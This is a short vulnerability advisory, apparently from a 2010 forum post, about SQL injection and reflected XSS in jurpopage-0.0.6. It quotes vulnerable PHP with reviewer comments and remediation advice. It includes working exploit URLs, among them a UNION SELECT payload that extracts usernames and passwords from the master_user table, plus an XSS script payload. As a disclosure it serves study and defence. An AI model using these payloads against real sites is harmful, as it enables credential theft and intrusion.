
13.03.2010, 21:54
jurpopage
product : jurpopage-0.0.6
admin panel : /jurpopageadmin
SQL injection
mq=off (magic_quotes_gpc = Off)
index.php
PHP код:
// Excerpt from index.php as quoted by the advisory. It is a fragment (note the
// unmatched closing brace and the "..." elision), not a complete listing.
//
// Root cause: request-derived values are interpolated into SQL text. The single
// quotes around each value only help if quote characters inside the value are
// escaped; no escaping or integer cast is visible anywhere in this excerpt.
// NOTE(review): the assignment of $page_id is not shown here. The advisory's
// URLs indicate it comes from the page_id request parameter; confirm in the full file.
//
// Remediation direction: validate page_id, category and id as integers (cast or
// reject) before use, or pass them as bound parameters if the database layer
// supports that, and replace extract() with explicit assignment of the one
// column each query is expected to return.
$query = "SELECT category_id AS category FROM category WHERE page_id='$page_id' ORDER BY category_id ASC LIMIT 0,1";
$result = fn_query($conn_id,$query);
// extract() with EXTR_OVERWRITE turns every fetched column into a variable of
// the same name, replacing any existing one; the alias above yields $category.
// If the query returns no row, the loop body never runs and $category keeps
// whatever value it had before this point.
// NOTE(review): presumably this is how a request-supplied "category" value
// reaches the later queries (see the advisory's second URL); confirm how
// request variables are imported in the full file.
while($rows = fn_fetch_array($result)) extract($rows,EXTR_OVERWRITE);
// Closes a block that was opened before the quoted excerpt begins.
}
// $category flows unchanged into $active_category_id and from there into every
// query and WHERE fragment built below.
$active_category_id = $category;
// Second query: both $page_id and $active_category_id are embedded as quoted literals.
$query = "SELECT category_title AS active_category_title FROM category WHERE page_id='$page_id' AND category_id = '$active_category_id'";
$result = fn_query($conn_id,$query);
// Same extract() pattern; the alias yields $active_category_title.
while($rows = fn_fetch_array($result)) extract($rows,EXTR_OVERWRITE);
// The condition tests the legacy $HTTP_GET_VARS["id"] array entry, but the SQL
// fragment uses the bare variable $id.
// NOTE(review): $id is presumably populated from the request by
// register_globals or an import outside this excerpt; confirm.
if(isset($HTTP_GET_VARS["id"])) $q_note_detail ="page_id = '$page_id' AND note_id = '$id'";
// Without an id, fall back to the newest note in the active category.
else $q_note_detail ="page_id = '$page_id' AND category_id = '$active_category_id' ORDER BY note_id DESC LIMIT 0,1";
// Elision made by the advisory author; the code in between is not shown.
...
// WHERE fragment built from the same two unvalidated values. Where it is
// appended to a query is outside the excerpt.
$q_page ="WHERE page_id = '$page_id' AND category_id = '$active_category_id' ";
result :
Код:
http://localhost/index.php?page_id=[sql]
Код:
http://localhost/index.php?page_id=1&category=[sql]
Код:
http://localhost/index.php?page_id=1&category=100&id=49'+union+all+select+1,2,concat_ws(0x3a,user_name,user_password),4+from+master_user+limit+1,1--+
jurpopageadmin/note.php
mq=off
доступ в админ панель
PHP код:
// Single line quoted from jurpopageadmin/note.php. $page_id is concatenated and
// $category_id is interpolated; both end up as quoted literals in the SQL text,
// so the two spellings are equivalent from an injection standpoint.
// No escaping or integer cast is visible on this line.
// NOTE(review): the advisory's URL passes "page_id" and "category", while the
// query uses $category_id. How the request value is mapped to $category_id is
// not shown; confirm in the full file.
// Remediation direction: validate both values as integers before use, or pass
// them as bound parameters if the database layer supports that.
$query = "SELECT category_title FROM category WHERE page_id = '".$page_id."' AND category_id = '$category_id'";
Код:
http://localhost/jurpopageadmin/note.php?page_id=[sql]&category=[sql]
Passive XSS
mq=off
Код:
http://localhost/index.php'%22/%3E%3Cscript%3Ealert(%22xss%22);%3C/script%3E